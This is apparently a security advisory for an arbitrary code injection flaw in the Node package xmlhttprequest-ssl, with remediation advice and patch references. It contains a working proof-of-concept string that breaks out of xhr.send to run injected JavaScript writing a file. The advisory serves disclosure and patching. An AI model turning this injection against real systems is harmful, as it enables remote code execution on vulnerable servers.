SNYK-JS-XMLHTTPREQUESTSSL-1082936
## Overview [xmlhttprequest-ssl](https://github.com/mjwwit/node-XMLHttpRequest) is a fork of `xmlhttprequest`. Affected versions of this package are vulnerable to Arbitrary Code Injection. Provided requests are sent synchronously (`async=False` on `xhr.open`), malicious user input flowing into `xhr.send` could result in arbitrary code being injected and run. ### POC ``` const { XMLHttpRequest } = require("xmlhttprequest") const xhr = new XMLHttpRequest() xhr.open("POST", "http://localhost.invalid/", false /* use synchronize request */) xhr.send("\\');require(\"fs\").writeFileSync(\"/tmp/aaaaa.txt\", \"poc-20210306\");req.end();//") ``` ## Remediation Upgrade `xmlhttprequest-ssl` to version 1.6.2 or higher. ## References - [GitHub Commit #1](https://github.com/driverdan/node-XMLHttpRequest/commit/983cfc244c7567ad6a59e366e55a8037e0497fe6) - [GitHub Commit #2](https://github.com/mjwwit/node-XMLHttpRequest/commit/ee1e81fc67729c7c0eba5537ed7fe1e30a6b3291) - [Vulnerable Code](https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js#L480)
Risk Scores
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| 0 |
Timeline
- Mar 5, 2021 CVE Updated
- Mar 5, 2021 CVE Published
References
- https://security.snyk.io/vuln/SNYK-JS-XMLHTTPREQUESTSSL-1082936 advisory
- https://learn.snyk.io/lesson/malicious-code-injection/ technical
- https://github.com/mjwwit/node-XMLHttpRequest technical
- https://github.com/driverdan/node-XMLHttpRequest/commit/983cfc244c7567ad6a59e366e55a8037e0497fe6 patch
- https://github.com/mjwwit/node-XMLHttpRequest/commit/ee1e81fc67729c7c0eba5537ed7fe1e30a6b3291 patch
- https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js#L480 technical
- http://localhost.invalid/ technical